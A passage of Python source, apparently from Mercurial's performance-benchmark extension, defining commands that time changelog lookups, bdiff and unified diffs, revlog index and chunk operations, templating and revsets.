911 911 cmd = sys.argv[0]
912 912 def d():
913 913 if os.name != b'nt':
914 914 os.system(b"HGRCPATH= %s version -q > /dev/null" % cmd)
915 915 else:
916 916 os.environ[b'HGRCPATH'] = b' '
917 917 os.system(b"%s version -q > NUL" % cmd)
918 918 timer(d)
919 919 fm.end()
920 920
921 921 @command(b'perfparents', formatteropts)
922 922 def perfparents(ui, repo, **opts):
923 923 timer, fm = gettimer(ui, opts)
924 924 # control the number of commits perfparents iterates over
925 925 # experimental config: perf.parentscount
926 926 count = getint(ui, b"perf", b"parentscount", 1000)
927 927 if len(repo.changelog) < count:
928 928 raise error.Abort(b"repo needs %d commits for this test" % count)
929 929 repo = repo.unfiltered()
930 930 nl = [repo.changelog.node(i) for i in xrange(count)]
931 931 def d():
932 932 for n in nl:
933 933 repo.changelog.parents(n)
934 934 timer(d)
935 935 fm.end()
936 936
937 937 @command(b'perfctxfiles', formatteropts)
938 938 def perfctxfiles(ui, repo, x, **opts):
939 939 x = int(x)
940 940 timer, fm = gettimer(ui, opts)
941 941 def d():
942 942 len(repo[x].files())
943 943 timer(d)
944 944 fm.end()
945 945
946 946 @command(b'perfrawfiles', formatteropts)
947 947 def perfrawfiles(ui, repo, x, **opts):
948 948 x = int(x)
949 949 timer, fm = gettimer(ui, opts)
950 950 cl = repo.changelog
951 951 def d():
952 952 len(cl.read(x)[3])
953 953 timer(d)
954 954 fm.end()
955 955
956 956 @command(b'perflookup', formatteropts)
957 957 def perflookup(ui, repo, rev, **opts):
958 958 timer, fm = gettimer(ui, opts)
959 959 timer(lambda: len(repo.lookup(rev)))
960 960 fm.end()
961 961
962 962 @command(b'perflinelogedits',
963 963 [(b'n', b'edits', 10000, b'number of edits'),
964 964 (b'', b'max-hunk-lines', 10, b'max lines in a hunk'),
965 965 ], norepo=True)
966 966 def perflinelogedits(ui, **opts):
967 967 from mercurial import linelog
968 968
969 969 edits = opts[b'edits']
970 970 maxhunklines = opts[b'max_hunk_lines']
971 971
972 972 maxb1 = 100000
973 973 random.seed(0)
974 974 randint = random.randint
975 975 currentlines = 0
976 976 arglist = []
977 977 for rev in xrange(edits):
978 978 a1 = randint(0, currentlines)
979 979 a2 = randint(a1, min(currentlines, a1 + maxhunklines))
980 980 b1 = randint(0, maxb1)
981 981 b2 = randint(b1, b1 + maxhunklines)
982 982 currentlines += (b2 - b1) - (a2 - a1)
983 983 arglist.append((rev, a1, a2, b1, b2))
984 984
985 985 def d():
986 986 ll = linelog.linelog()
987 987 for args in arglist:
988 988 ll.replacelines(*args)
989 989
990 990 timer, fm = gettimer(ui, opts)
991 991 timer(d)
992 992 fm.end()
993 993
994 994 @command(b'perfrevrange', formatteropts)
995 995 def perfrevrange(ui, repo, *specs, **opts):
996 996 timer, fm = gettimer(ui, opts)
997 997 revrange = scmutil.revrange
998 998 timer(lambda: len(revrange(repo, specs)))
999 999 fm.end()
1000 1000
1001 1001 @command(b'perfnodelookup', formatteropts)
1002 1002 def perfnodelookup(ui, repo, rev, **opts):
1003 1003 timer, fm = gettimer(ui, opts)
1004 1004 import mercurial.revlog
1005 1005 mercurial.revlog._prereadsize = 2**24 # disable lazy parser in old hg
1006 1006 n = scmutil.revsingle(repo, rev).node()
1007 1007 cl = mercurial.revlog.revlog(getsvfs(repo), b"00changelog.i")
1008 1008 def d():
1009 1009 cl.rev(n)
1010 1010 clearcaches(cl)
1011 1011 timer(d)
1012 1012 fm.end()
1013 1013
1014 1014 @command(b'perflog',
1015 1015 [(b'', b'rename', False, b'ask log to follow renames')
1016 1016 ] + formatteropts)
1017 1017 def perflog(ui, repo, rev=None, **opts):
1018 1018 if rev is None:
1019 1019 rev=[]
1020 1020 timer, fm = gettimer(ui, opts)
1021 1021 ui.pushbuffer()
1022 1022 timer(lambda: commands.log(ui, repo, rev=rev, date=b'', user=b'',
1023 1023 copies=opts.get(b'rename')))
1024 1024 ui.popbuffer()
1025 1025 fm.end()
1026 1026
1027 1027 @command(b'perfmoonwalk', formatteropts)
1028 1028 def perfmoonwalk(ui, repo, **opts):
1029 1029 """benchmark walking the changelog backwards
1030 1030
1031 1031 This also loads the changelog data for each revision in the changelog.
1032 1032 """
1033 1033 timer, fm = gettimer(ui, opts)
1034 1034 def moonwalk():
1035 1035 for i in repo.changelog.revs(start=(len(repo) - 1), stop=-1):
1036 1036 ctx = repo[i]
1037 1037 ctx.branch() # read changelog data (in addition to the index)
1038 1038 timer(moonwalk)
1039 1039 fm.end()
1040 1040
1041 1041 @command(b'perftemplating',
1042 1042 [(b'r', b'rev', [], b'revisions to run the template on'),
1043 1043 ] + formatteropts)
1044 1044 def perftemplating(ui, repo, testedtemplate=None, **opts):
1045 1045 """test the rendering time of a given template"""
1046 1046 if makelogtemplater is None:
1047 1047 raise error.Abort((b"perftemplating not available with this Mercurial"),
1048 1048 hint=b"use 4.3 or later")
1049 1049
1050 1050 nullui = ui.copy()
1051 1051 nullui.fout = open(os.devnull, b'wb')
1052 1052 nullui.disablepager()
1053 1053 revs = opts.get(b'rev')
1054 1054 if not revs:
1055 1055 revs = [b'all()']
1056 1056 revs = list(scmutil.revrange(repo, revs))
1057 1057
1058 1058 defaulttemplate = (b'{date|shortdate} [{rev}:{node|short}]'
1059 1059 b' {author|person}: {desc|firstline}\n')
1060 1060 if testedtemplate is None:
1061 1061 testedtemplate = defaulttemplate
1062 1062 displayer = makelogtemplater(nullui, repo, testedtemplate)
1063 1063 def format():
1064 1064 for r in revs:
1065 1065 ctx = repo[r]
1066 1066 displayer.show(ctx)
1067 1067 displayer.flush(ctx)
1068 1068
1069 1069 timer, fm = gettimer(ui, opts)
1070 1070 timer(format)
1071 1071 fm.end()
1072 1072
1073 1073 @command(b'perfcca', formatteropts)
1074 1074 def perfcca(ui, repo, **opts):
1075 1075 timer, fm = gettimer(ui, opts)
1076 1076 timer(lambda: scmutil.casecollisionauditor(ui, False, repo.dirstate))
1077 1077 fm.end()
1078 1078
1079 1079 @command(b'perffncacheload', formatteropts)
1080 1080 def perffncacheload(ui, repo, **opts):
1081 1081 timer, fm = gettimer(ui, opts)
1082 1082 s = repo.store
1083 1083 def d():
1084 1084 s.fncache._load()
1085 1085 timer(d)
1086 1086 fm.end()
1087 1087
1088 1088 @command(b'perffncachewrite', formatteropts)
1089 1089 def perffncachewrite(ui, repo, **opts):
1090 1090 timer, fm = gettimer(ui, opts)
1091 1091 s = repo.store
1092 1092 lock = repo.lock()
1093 1093 s.fncache._load()
1094 1094 tr = repo.transaction(b'perffncachewrite')
1095 1095 tr.addbackup(b'fncache')
1096 1096 def d():
1097 1097 s.fncache._dirty = True
1098 1098 s.fncache.write(tr)
1099 1099 timer(d)
1100 1100 tr.close()
1101 1101 lock.release()
1102 1102 fm.end()
1103 1103
1104 1104 @command(b'perffncacheencode', formatteropts)
1105 1105 def perffncacheencode(ui, repo, **opts):
1106 1106 timer, fm = gettimer(ui, opts)
1107 1107 s = repo.store
1108 1108 s.fncache._load()
1109 1109 def d():
1110 1110 for p in s.fncache.entries:
1111 1111 s.encode(p)
1112 1112 timer(d)
1113 1113 fm.end()
1114 1114
1115 1115 def _bdiffworker(q, blocks, xdiff, ready, done):
1116 1116 while not done.is_set():
1117 1117 pair = q.get()
1118 1118 while pair is not None:
1119 1119 if xdiff:
1120 1120 mdiff.bdiff.xdiffblocks(*pair)
1121 1121 elif blocks:
1122 1122 mdiff.bdiff.blocks(*pair)
1123 1123 else:
1124 1124 mdiff.textdiff(*pair)
1125 1125 q.task_done()
1126 1126 pair = q.get()
1127 1127 q.task_done() # for the None one
1128 1128 with ready:
1129 1129 ready.wait()
1130 1130
1131 1131 def _manifestrevision(repo, mnode):
1132 1132 ml = repo.manifestlog
1133 1133
1134 1134 if util.safehasattr(ml, b'getstorage'):
1135 1135 store = ml.getstorage(b'')
1136 1136 else:
1137 1137 store = ml._revlog
1138 1138
1139 1139 return store.revision(mnode)
1140 1140
1141 1141 @command(b'perfbdiff', revlogopts + formatteropts + [
1142 1142 (b'', b'count', 1, b'number of revisions to test (when using --startrev)'),
1143 1143 (b'', b'alldata', False, b'test bdiffs for all associated revisions'),
1144 1144 (b'', b'threads', 0, b'number of thread to use (disable with 0)'),
1145 1145 (b'', b'blocks', False, b'test computing diffs into blocks'),
1146 1146 (b'', b'xdiff', False, b'use xdiff algorithm'),
1147 1147 ],
1148 1148
1149 1149 b'-c|-m|FILE REV')
1150 1150 def perfbdiff(ui, repo, file_, rev=None, count=None, threads=0, **opts):
1151 1151 """benchmark a bdiff between revisions
1152 1152
1153 1153 By default, benchmark a bdiff between its delta parent and itself.
1154 1154
1155 1155 With ``--count``, benchmark bdiffs between delta parents and self for N
1156 1156 revisions starting at the specified revision.
1157 1157
1158 1158 With ``--alldata``, assume the requested revision is a changeset and
1159 1159 measure bdiffs for all changes related to that changeset (manifest
1160 1160 and filelogs).
1161 1161 """
1162 1162 opts = pycompat.byteskwargs(opts)
1163 1163
1164 1164 if opts[b'xdiff'] and not opts[b'blocks']:
1165 1165 raise error.CommandError(b'perfbdiff', b'--xdiff requires --blocks')
1166 1166
1167 1167 if opts[b'alldata']:
1168 1168 opts[b'changelog'] = True
1169 1169
1170 1170 if opts.get(b'changelog') or opts.get(b'manifest'):
1171 1171 file_, rev = None, file_
1172 1172 elif rev is None:
1173 1173 raise error.CommandError(b'perfbdiff', b'invalid arguments')
1174 1174
1175 1175 blocks = opts[b'blocks']
1176 1176 xdiff = opts[b'xdiff']
1177 1177 textpairs = []
1178 1178
1179 1179 r = cmdutil.openrevlog(repo, b'perfbdiff', file_, opts)
1180 1180
1181 1181 startrev = r.rev(r.lookup(rev))
1182 1182 for rev in range(startrev, min(startrev + count, len(r) - 1)):
1183 1183 if opts[b'alldata']:
1184 1184 # Load revisions associated with changeset.
1185 1185 ctx = repo[rev]
1186 1186 mtext = _manifestrevision(repo, ctx.manifestnode())
1187 1187 for pctx in ctx.parents():
1188 1188 pman = _manifestrevision(repo, pctx.manifestnode())
1189 1189 textpairs.append((pman, mtext))
1190 1190
1191 1191 # Load filelog revisions by iterating manifest delta.
1192 1192 man = ctx.manifest()
1193 1193 pman = ctx.p1().manifest()
1194 1194 for filename, change in pman.diff(man).items():
1195 1195 fctx = repo.file(filename)
1196 1196 f1 = fctx.revision(change[0][0] or -1)
1197 1197 f2 = fctx.revision(change[1][0] or -1)
1198 1198 textpairs.append((f1, f2))
1199 1199 else:
1200 1200 dp = r.deltaparent(rev)
1201 1201 textpairs.append((r.revision(dp), r.revision(rev)))
1202 1202
1203 1203 withthreads = threads > 0
1204 1204 if not withthreads:
1205 1205 def d():
1206 1206 for pair in textpairs:
1207 1207 if xdiff:
1208 1208 mdiff.bdiff.xdiffblocks(*pair)
1209 1209 elif blocks:
1210 1210 mdiff.bdiff.blocks(*pair)
1211 1211 else:
1212 1212 mdiff.textdiff(*pair)
1213 1213 else:
1214 1214 q = queue()
1215 1215 for i in xrange(threads):
1216 1216 q.put(None)
1217 1217 ready = threading.Condition()
1218 1218 done = threading.Event()
1219 1219 for i in xrange(threads):
1220 1220 threading.Thread(target=_bdiffworker,
1221 1221 args=(q, blocks, xdiff, ready, done)).start()
1222 1222 q.join()
1223 1223 def d():
1224 1224 for pair in textpairs:
1225 1225 q.put(pair)
1226 1226 for i in xrange(threads):
1227 1227 q.put(None)
1228 1228 with ready:
1229 1229 ready.notify_all()
1230 1230 q.join()
1231 1231 timer, fm = gettimer(ui, opts)
1232 1232 timer(d)
1233 1233 fm.end()
1234 1234
1235 1235 if withthreads:
1236 1236 done.set()
1237 1237 for i in xrange(threads):
1238 1238 q.put(None)
1239 1239 with ready:
1240 1240 ready.notify_all()
1241 1241
1242 1242 @command(b'perfunidiff', revlogopts + formatteropts + [
1243 1243 (b'', b'count', 1, b'number of revisions to test (when using --startrev)'),
1244 1244 (b'', b'alldata', False, b'test unidiffs for all associated revisions'),
1245 1245 ], b'-c|-m|FILE REV')
1246 1246 def perfunidiff(ui, repo, file_, rev=None, count=None, **opts):
1247 1247 """benchmark a unified diff between revisions
1248 1248
1249 1249 This doesn't include any copy tracing - it's just a unified diff
1250 1250 of the texts.
1251 1251
1252 1252 By default, benchmark a diff between its delta parent and itself.
1253 1253
1254 1254 With ``--count``, benchmark diffs between delta parents and self for N
1255 1255 revisions starting at the specified revision.
1256 1256
1257 1257 With ``--alldata``, assume the requested revision is a changeset and
1258 1258 measure diffs for all changes related to that changeset (manifest
1259 1259 and filelogs).
1260 1260 """
1261 1261 if opts[b'alldata']:
1262 1262 opts[b'changelog'] = True
1263 1263
1264 1264 if opts.get(b'changelog') or opts.get(b'manifest'):
1265 1265 file_, rev = None, file_
1266 1266 elif rev is None:
1267 1267 raise error.CommandError(b'perfunidiff', b'invalid arguments')
1268 1268
1269 1269 textpairs = []
1270 1270
1271 1271 r = cmdutil.openrevlog(repo, b'perfunidiff', file_, opts)
1272 1272
1273 1273 startrev = r.rev(r.lookup(rev))
1274 1274 for rev in range(startrev, min(startrev + count, len(r) - 1)):
1275 1275 if opts[b'alldata']:
1276 1276 # Load revisions associated with changeset.
1277 1277 ctx = repo[rev]
1278 1278 mtext = _manifestrevision(repo, ctx.manifestnode())
1279 1279 for pctx in ctx.parents():
1280 1280 pman = _manifestrevision(repo, pctx.manifestnode())
1281 1281 textpairs.append((pman, mtext))
1282 1282
1283 1283 # Load filelog revisions by iterating manifest delta.
1284 1284 man = ctx.manifest()
1285 1285 pman = ctx.p1().manifest()
1286 1286 for filename, change in pman.diff(man).items():
1287 1287 fctx = repo.file(filename)
1288 1288 f1 = fctx.revision(change[0][0] or -1)
1289 1289 f2 = fctx.revision(change[1][0] or -1)
1290 1290 textpairs.append((f1, f2))
1291 1291 else:
1292 1292 dp = r.deltaparent(rev)
1293 1293 textpairs.append((r.revision(dp), r.revision(rev)))
1294 1294
1295 1295 def d():
1296 1296 for left, right in textpairs:
1297 1297 # The date strings don't matter, so we pass empty strings.
1298 1298 headerlines, hunks = mdiff.unidiff(
1299 1299 left, b'', right, b'', b'left', b'right', binary=False)
1300 1300 # consume iterators in roughly the way patch.py does
1301 1301 b'\n'.join(headerlines)
1302 1302 b''.join(sum((list(hlines) for hrange, hlines in hunks), []))
1303 1303 timer, fm = gettimer(ui, opts)
1304 1304 timer(d)
1305 1305 fm.end()
1306 1306
1307 1307 @command(b'perfdiffwd', formatteropts)
1308 1308 def perfdiffwd(ui, repo, **opts):
1309 1309 """Profile diff of working directory changes"""
1310 1310 timer, fm = gettimer(ui, opts)
1311 1311 options = {
1312 1312 b'w': b'ignore_all_space',
1313 1313 b'b': b'ignore_space_change',
1314 1314 b'B': b'ignore_blank_lines',
1315 1315 }
1316 1316
1317 1317 for diffopt in (b'', b'w', b'b', b'B', b'wB'):
1318 1318 opts = dict((options[c], b'1') for c in diffopt)
1319 1319 def d():
1320 1320 ui.pushbuffer()
1321 1321 commands.diff(ui, repo, **opts)
1322 1322 ui.popbuffer()
1323 1323 title = b'diffopts: %s' % (diffopt and (b'-' + diffopt) or b'none')
1324 1324 timer(d, title)
1325 1325 fm.end()
1326 1326
1327 1327 @command(b'perfrevlogindex', revlogopts + formatteropts,
1328 1328 b'-c|-m|FILE')
1329 1329 def perfrevlogindex(ui, repo, file_=None, **opts):
1330 1330 """Benchmark operations against a revlog index.
1331 1331
1332 1332 This tests constructing a revlog instance, reading index data,
1333 1333 parsing index data, and performing various operations related to
1334 1334 index data.
1335 1335 """
1336 1336
1337 1337 rl = cmdutil.openrevlog(repo, b'perfrevlogindex', file_, opts)
1338 1338
1339 1339 opener = getattr(rl, 'opener') # trick linter
1340 1340 indexfile = rl.indexfile
1341 1341 data = opener.read(indexfile)
1342 1342
1343 1343 header = struct.unpack(b'>I', data[0:4])[0]
1344 1344 version = header & 0xFFFF
1345 1345 if version == 1:
1346 1346 revlogio = revlog.revlogio()
1347 1347 inline = header & (1 << 16)
1348 1348 else:
1349 1349 raise error.Abort((b'unsupported revlog version: %d') % version)
1350 1350
1351 1351 rllen = len(rl)
1352 1352
1353 1353 node0 = rl.node(0)
1354 1354 node25 = rl.node(rllen // 4)
1355 1355 node50 = rl.node(rllen // 2)
1356 1356 node75 = rl.node(rllen // 4 * 3)
1357 1357 node100 = rl.node(rllen - 1)
1358 1358
1359 1359 allrevs = range(rllen)
1360 1360 allrevsrev = list(reversed(allrevs))
1361 1361 allnodes = [rl.node(rev) for rev in range(rllen)]
1362 1362 allnodesrev = list(reversed(allnodes))
1363 1363
1364 1364 def constructor():
1365 1365 revlog.revlog(opener, indexfile)
1366 1366
1367 1367 def read():
1368 1368 with opener(indexfile) as fh:
1369 1369 fh.read()
1370 1370
1371 1371 def parseindex():
1372 1372 revlogio.parseindex(data, inline)
1373 1373
1374 1374 def getentry(revornode):
1375 1375 index = revlogio.parseindex(data, inline)[0]
1376 1376 index[revornode]
1377 1377
1378 1378 def getentries(revs, count=1):
1379 1379 index = revlogio.parseindex(data, inline)[0]
1380 1380
1381 1381 for i in range(count):
1382 1382 for rev in revs:
1383 1383 index[rev]
1384 1384
1385 1385 def resolvenode(node):
1386 1386 nodemap = revlogio.parseindex(data, inline)[1]
1387 1387 # This only works for the C code.
1388 1388 if nodemap is None:
1389 1389 return
1390 1390
1391 1391 try:
1392 1392 nodemap[node]
1393 1393 except error.RevlogError:
1394 1394 pass
1395 1395
1396 1396 def resolvenodes(nodes, count=1):
1397 1397 nodemap = revlogio.parseindex(data, inline)[1]
1398 1398 if nodemap is None:
1399 1399 return
1400 1400
1401 1401 for i in range(count):
1402 1402 for node in nodes:
1403 1403 try:
1404 1404 nodemap[node]
1405 1405 except error.RevlogError:
1406 1406 pass
1407 1407
1408 1408 benches = [
1409 1409 (constructor, b'revlog constructor'),
1410 1410 (read, b'read'),
1411 1411 (parseindex, b'create index object'),
1412 1412 (lambda: getentry(0), b'retrieve index entry for rev 0'),
1413 1413 (lambda: resolvenode(b'a' * 20), b'look up missing node'),
1414 1414 (lambda: resolvenode(node0), b'look up node at rev 0'),
1415 1415 (lambda: resolvenode(node25), b'look up node at 1/4 len'),
1416 1416 (lambda: resolvenode(node50), b'look up node at 1/2 len'),
1417 1417 (lambda: resolvenode(node75), b'look up node at 3/4 len'),
1418 1418 (lambda: resolvenode(node100), b'look up node at tip'),
1419 1419 # 2x variation is to measure caching impact.
1420 1420 (lambda: resolvenodes(allnodes),
1421 1421 b'look up all nodes (forward)'),
1422 1422 (lambda: resolvenodes(allnodes, 2),
1423 1423 b'look up all nodes 2x (forward)'),
1424 1424 (lambda: resolvenodes(allnodesrev),
1425 1425 b'look up all nodes (reverse)'),
1426 1426 (lambda: resolvenodes(allnodesrev, 2),
1427 1427 b'look up all nodes 2x (reverse)'),
1428 1428 (lambda: getentries(allrevs),
1429 1429 b'retrieve all index entries (forward)'),
1430 1430 (lambda: getentries(allrevs, 2),
1431 1431 b'retrieve all index entries 2x (forward)'),
1432 1432 (lambda: getentries(allrevsrev),
1433 1433 b'retrieve all index entries (reverse)'),
1434 1434 (lambda: getentries(allrevsrev, 2),
1435 1435 b'retrieve all index entries 2x (reverse)'),
1436 1436 ]
1437 1437
1438 1438 for fn, title in benches:
1439 1439 timer, fm = gettimer(ui, opts)
1440 1440 timer(fn, title=title)
1441 1441 fm.end()
1442 1442
1443 1443 @command(b'perfrevlogrevisions', revlogopts + formatteropts +
1444 1444 [(b'd', b'dist', 100, b'distance between the revisions'),
1445 1445 (b's', b'startrev', 0, b'revision to start reading at'),
1446 1446 (b'', b'reverse', False, b'read in reverse')],
1447 1447 b'-c|-m|FILE')
1448 1448 def perfrevlogrevisions(ui, repo, file_=None, startrev=0, reverse=False,
1449 1449 **opts):
1450 1450 """Benchmark reading a series of revisions from a revlog.
1451 1451
1452 1452 By default, we read every ``-d/--dist`` revision from 0 to tip of
1453 1453 the specified revlog.
1454 1454
1455 1455 The start revision can be defined via ``-s/--startrev``.
1456 1456 """
1457 1457 rl = cmdutil.openrevlog(repo, b'perfrevlogrevisions', file_, opts)
1458 1458 rllen = getlen(ui)(rl)
1459 1459
1460 1460 def d():
1461 1461 rl.clearcaches()
1462 1462
1463 1463 beginrev = startrev
1464 1464 endrev = rllen
1465 1465 dist = opts[b'dist']
1466 1466
1467 1467 if reverse:
1468 1468 beginrev, endrev = endrev, beginrev
1469 1469 dist = -1 * dist
1470 1470
1471 1471 for x in xrange(beginrev, endrev, dist):
1472 1472 # Old revisions don't support passing int.
1473 1473 n = rl.node(x)
1474 1474 rl.revision(n)
1475 1475
1476 1476 timer, fm = gettimer(ui, opts)
1477 1477 timer(d)
1478 1478 fm.end()
1479 1479
1480 1480 @command(b'perfrevlogchunks', revlogopts + formatteropts +
1481 1481 [(b'e', b'engines', b'', b'compression engines to use'),
1482 1482 (b's', b'startrev', 0, b'revision to start at')],
1483 1483 b'-c|-m|FILE')
1484 1484 def perfrevlogchunks(ui, repo, file_=None, engines=None, startrev=0, **opts):
1485 1485 """Benchmark operations on revlog chunks.
1486 1486
1487 1487 Logically, each revlog is a collection of fulltext revisions. However,
1488 1488 stored within each revlog are "chunks" of possibly compressed data. This
1489 1489 data needs to be read and decompressed or compressed and written.
1490 1490
1491 1491 This command measures the time it takes to read+decompress and recompress
1492 1492 chunks in a revlog. It effectively isolates I/O and compression performance.
1493 1493 For measurements of higher-level operations like resolving revisions,
1494 1494 see ``perfrevlogrevisions`` and ``perfrevlogrevision``.
1495 1495 """
1496 1496 rl = cmdutil.openrevlog(repo, b'perfrevlogchunks', file_, opts)
1497 1497
1498 1498 # _chunkraw was renamed to _getsegmentforrevs.
1499 1499 try:
1500 1500 segmentforrevs = rl._getsegmentforrevs
1501 1501 except AttributeError:
1502 1502 segmentforrevs = rl._chunkraw
1503 1503
1504 1504 # Verify engines argument.
1505 1505 if engines:
1506 1506 engines = set(e.strip() for e in engines.split(b','))
1507 1507 for engine in engines:
1508 1508 try:
1509 1509 util.compressionengines[engine]
1510 1510 except KeyError:
1511 1511 raise error.Abort(b'unknown compression engine: %s' % engine)
1512 1512 else:
1513 1513 engines = []
1514 1514 for e in util.compengines:
1515 1515 engine = util.compengines[e]
1516 1516 try:
1517 1517 if engine.available():
1518 1518 engine.revlogcompressor().compress(b'dummy')
1519 1519 engines.append(e)
1520 1520 except NotImplementedError:
1521 1521 pass
1522 1522
1523 1523 revs = list(rl.revs(startrev, len(rl) - 1))
1524 1524
1525 1525 def rlfh(rl):
1526 1526 if rl._inline:
1527 1527 return getsvfs(repo)(rl.indexfile)
1528 1528 else:
1529 1529 return getsvfs(repo)(rl.datafile)
1530 1530
1531 1531 def doread():
1532 1532 rl.clearcaches()
1533 1533 for rev in revs:
1534 1534 segmentforrevs(rev, rev)
1535 1535
1536 1536 def doreadcachedfh():
1537 1537 rl.clearcaches()
1538 1538 fh = rlfh(rl)
1539 1539 for rev in revs:
1540 1540 segmentforrevs(rev, rev, df=fh)
1541 1541
1542 1542 def doreadbatch():
1543 1543 rl.clearcaches()
1544 1544 segmentforrevs(revs[0], revs[-1])
1545 1545
1546 1546 def doreadbatchcachedfh():
1547 1547 rl.clearcaches()
1548 1548 fh = rlfh(rl)
1549 1549 segmentforrevs(revs[0], revs[-1], df=fh)
1550 1550
1551 1551 def dochunk():
1552 1552 rl.clearcaches()
1553 1553 fh = rlfh(rl)
1554 1554 for rev in revs:
1555 1555 rl._chunk(rev, df=fh)
1556 1556
1557 1557 chunks = [None]
1558 1558
1559 1559 def dochunkbatch():
1560 1560 rl.clearcaches()
1561 1561 fh = rlfh(rl)
1562 1562 # Save chunks as a side-effect.
1563 1563 chunks[0] = rl._chunks(revs, df=fh)
1564 1564
1565 1565 def docompress(compressor):
1566 1566 rl.clearcaches()
1567 1567
1568 1568 try:
1569 1569 # Swap in the requested compression engine.
1570 1570 oldcompressor = rl._compressor
1571 1571 rl._compressor = compressor
1572 1572 for chunk in chunks[0]:
1573 1573 rl.compress(chunk)
1574 1574 finally:
1575 1575 rl._compressor = oldcompressor
1576 1576
1577 1577 benches = [
1578 1578 (lambda: doread(), b'read'),
1579 1579 (lambda: doreadcachedfh(), b'read w/ reused fd'),
1580 1580 (lambda: doreadbatch(), b'read batch'),
1581 1581 (lambda: doreadbatchcachedfh(), b'read batch w/ reused fd'),
1582 1582 (lambda: dochunk(), b'chunk'),
1583 1583 (lambda: dochunkbatch(), b'chunk batch'),
1584 1584 ]
1585 1585
1586 1586 for engine in sorted(engines):
1587 1587 compressor = util.compengines[engine].revlogcompressor()
1588 1588 benches.append((functools.partial(docompress, compressor),
1589 1589 b'compress w/ %s' % engine))
1590 1590
1591 1591 for fn, title in benches:
1592 1592 timer, fm = gettimer(ui, opts)
1593 1593 timer(fn, title=title)
1594 1594 fm.end()
1595 1595
1596 1596 @command(b'perfrevlogrevision', revlogopts + formatteropts +
1597 1597 [(b'', b'cache', False, b'use caches instead of clearing')],
1598 1598 b'-c|-m|FILE REV')
1599 1599 def perfrevlogrevision(ui, repo, file_, rev=None, cache=None, **opts):
1600 1600 """Benchmark obtaining a revlog revision.
1601 1601
1602 1602 Obtaining a revlog revision consists of roughly the following steps:
1603 1603
1604 1604 1. Compute the delta chain
1605 1605 2. Obtain the raw chunks for that delta chain
1606 1606 3. Decompress each raw chunk
1607 1607 4. Apply binary patches to obtain fulltext
1608 1608 5. Verify hash of fulltext
1609 1609
1610 1610 This command measures the time spent in each of these phases.
1611 1611 """
1612 1612 if opts.get(b'changelog') or opts.get(b'manifest'):
1613 1613 file_, rev = None, file_
1614 1614 elif rev is None:
1615 1615 raise error.CommandError(b'perfrevlogrevision', b'invalid arguments')
1616 1616
1617 1617 r = cmdutil.openrevlog(repo, b'perfrevlogrevision', file_, opts)
1618 1618
1619 1619 # _chunkraw was renamed to _getsegmentforrevs.
1620 1620 try:
1621 1621 segmentforrevs = r._getsegmentforrevs
1622 1622 except AttributeError:
1623 1623 segmentforrevs = r._chunkraw
1624 1624
1625 1625 node = r.lookup(rev)
1626 1626 rev = r.rev(node)
1627 1627
1628 1628 def getrawchunks(data, chain):
1629 1629 start = r.start
1630 1630 length = r.length
1631 1631 inline = r._inline
1632 1632 iosize = r._io.size
1633 1633 buffer = util.buffer
1634 1634 offset = start(chain[0])
1635 1635
1636 1636 chunks = []
1637 1637 ladd = chunks.append
1638 1638
1639 1639 for rev in chain:
1640 1640 chunkstart = start(rev)
1641 1641 if inline:
1642 1642 chunkstart += (rev + 1) * iosize
1643 1643 chunklength = length(rev)
1644 1644 ladd(buffer(data, chunkstart - offset, chunklength))
1645 1645
1646 1646 return chunks
1647 1647
1648 1648 def dodeltachain(rev):
1649 1649 if not cache:
1650 1650 r.clearcaches()
1651 1651 r._deltachain(rev)
1652 1652
1653 1653 def doread(chain):
1654 1654 if not cache:
1655 1655 r.clearcaches()
1656 1656 segmentforrevs(chain[0], chain[-1])
1657 1657
1658 1658 def dorawchunks(data, chain):
1659 1659 if not cache:
1660 1660 r.clearcaches()
1661 1661 getrawchunks(data, chain)
1662 1662
1663 1663 def dodecompress(chunks):
1664 1664 decomp = r.decompress
1665 1665 for chunk in chunks:
1666 1666 decomp(chunk)
1667 1667
1668 1668 def dopatch(text, bins):
1669 1669 if not cache:
1670 1670 r.clearcaches()
1671 1671 mdiff.patches(text, bins)
1672 1672
1673 1673 def dohash(text):
1674 1674 if not cache:
1675 1675 r.clearcaches()
1676 1676 r.checkhash(text, node, rev=rev)
1677 1677
1678 1678 def dorevision():
1679 1679 if not cache:
1680 1680 r.clearcaches()
1681 1681 r.revision(node)
1682 1682
1683 1683 chain = r._deltachain(rev)[0]
1684 1684 data = segmentforrevs(chain[0], chain[-1])[1]
1685 1685 rawchunks = getrawchunks(data, chain)
1686 1686 bins = r._chunks(chain)
1687 1687 text = str(bins[0])
1688 1688 bins = bins[1:]
1689 1689 text = mdiff.patches(text, bins)
1690 1690
1691 1691 benches = [
1692 1692 (lambda: dorevision(), b'full'),
1693 1693 (lambda: dodeltachain(rev), b'deltachain'),
1694 1694 (lambda: doread(chain), b'read'),
1695 1695 (lambda: dorawchunks(data, chain), b'rawchunks'),
1696 1696 (lambda: dodecompress(rawchunks), b'decompress'),
1697 1697 (lambda: dopatch(text, bins), b'patch'),
1698 1698 (lambda: dohash(text), b'hash'),
1699 1699 ]
1700 1700
1701 1701 for fn, title in benches:
1702 1702 timer, fm = gettimer(ui, opts)
1703 1703 timer(fn, title=title)
1704 1704 fm.end()
1705 1705
1706 1706 @command(b'perfrevset',
1707 1707 [(b'C', b'clear', False, b'clear volatile cache between each call.'),
1708 1708 (b'', b'contexts', False, b'obtain changectx for each revision')]
1709 1709 + formatteropts, b"REVSET")
1710 1710 def perfrevset(ui, repo, expr, clear=False, contexts=False, **opts):
1711 1711 """benchmark the execution time of a revset
1712 1712
1713 1713 Use the --clean option if need to evaluate the impact of build volatile
1714 1714 revisions set cache on the revset execution. Volatile cache hold filtered
1715 1715 and obsolete related cache."""
1716 1716 timer, fm = gettimer(ui, opts)
1717 1717 def d():
1718 1718 if clear:
1719 1719 repo.invalidatevolatilesets()
1720 1720 if contexts:
1721 1721 for ctx in repo.set(expr): pass
1722 1722 else:
1723 1723 for r in repo.revs(expr): pass
1724 1724 timer(d)
1725 1725 fm.end()
1726 1726
1727 1727 @command(b'perfvolatilesets',
1728 1728 [(b'', b'clear-obsstore', False, b'drop obsstore between each call.'),
1729 1729 ] + formatteropts)
1730 1730 def perfvolatilesets(ui, repo, *names, **opts):
1731 1731 """benchmark the computation of various volatile set
1732 1732
1733 1733 Volatile set computes element related to filtering and obsolescence."""
1734 1734 timer, fm = gettimer(ui, opts)
1735 1735 repo = repo.unfiltered()
1736 1736
1737 1737 def getobs(name):
1738 1738 def d():
1739 1739 repo.invalidatevolatilesets()
1740 1740 if opts[b'clear_obsstore']:
